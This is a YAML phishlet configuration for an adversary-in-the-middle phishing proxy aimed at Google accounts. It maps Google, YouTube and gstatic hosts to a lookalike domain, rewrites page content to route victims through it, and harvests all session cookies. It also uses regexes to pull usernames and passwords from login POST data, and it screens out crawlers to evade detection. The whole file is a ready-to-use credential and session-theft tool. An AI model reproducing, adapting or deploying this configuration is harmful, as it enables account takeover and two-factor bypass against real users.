name: "Google"
author: "Simpler Hacking"
min_ver: "3.2.0"

proxy_hosts:
  - {
      phish_sub: "adsfsd",
      orig_sub: "accounts",
      domain: "google.com",
      session: true,
      is_landing: true,
      auto_filter: false,
    }
  - {
      phish_sub: "fdggfg",
      orig_sub: "www",
      domain: "google.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "youtube",
      orig_sub: "accounts",
      domain: "youtube.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "dgffdg",
      orig_sub: "play",
      domain: "google.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "www-gstatic",
      orig_sub: "www",
      domain: "gstatic.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "fonts",
      orig_sub: "fonts",
      domain: "gstatic.com",
      session: true,
      is_landing: false,
    }

sub_filters:
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "accounts.google.com"
    replace: "adsfsd.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://accounts.google.com"
    replace: "https://adsfsd.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "www.google.com"
    replace: "fdggfg.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://www.accounts.google.com"
    replace: "https://fdggfg.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "accounts.youtube.com"
    replace: "youtube.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://accounts.youtube.com"
    replace: "https://youtube.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "play.google.com"
    replace: "dgffdg.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://play.google.com"
    replace: "https://dgffdg.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "www.gstatic.com"
    replace: "www-gstatic.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://www.gstatic.com"
    replace: "https://www-gstatic.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://fonts.gstatic.com"
    replace: "https://fonts.google.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  # Replace sensitive Google domains in your redirects dynamically
  - triggers_on: "accounts.google.com"
    orig_sub: "accounts"
    domain: "google.com"
    search: "https://accounts.google.com/ServiceLogin"
    replace: "https://adsfsd.google.deshidealz.xyz/login"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

auth_tokens:
  - domain: ".google.com"
    keys: [".*,regexp"]
  - domain: "accounts.google.com"
    keys: [".*,regexp"]
  - domain: "accounts.google.bg"
    keys: [".*,regexp"]

credentials:
  username:
    key: "f.req"
    search: '\],"([^"]*)"\]$'
    type: "post"
  password:
    key: "f.req"
    search: ',\["([^"]*)",'
    type: "post"

  custom:
    - key: "useragent"
      search: "(Mozilla/5.0.*)"
      type: "post"
    - key: "browser"
      search: "(.*)"
      type: "post"
    - key: "engine"
      search: "(.*)"
      type: "post"
    - key: "platform"
      search: "(.*)"
      type: "post"
    - key: "bot_check"
      search: "(googlebot|crawler|bot)"
      type: "header" # Add header-based filtering to detect and block bots.

auth_urls:
  - "/CheckCookie"
  - "/ManageAccount"

login:
  domain: "accounts.google.com"
  path: "/v3/signin/identifier?flowName=GlifWebSignIn"
  # path: "/ServiceLogin"
force_post:
  - path: "/_/signin/sl/challenge"
    search:
      - { key: "f.req", search: ".*" }
      - { key: "continue", search: ".*" }
    force:
      - { key: "continue", value: "" }
    type: "post"
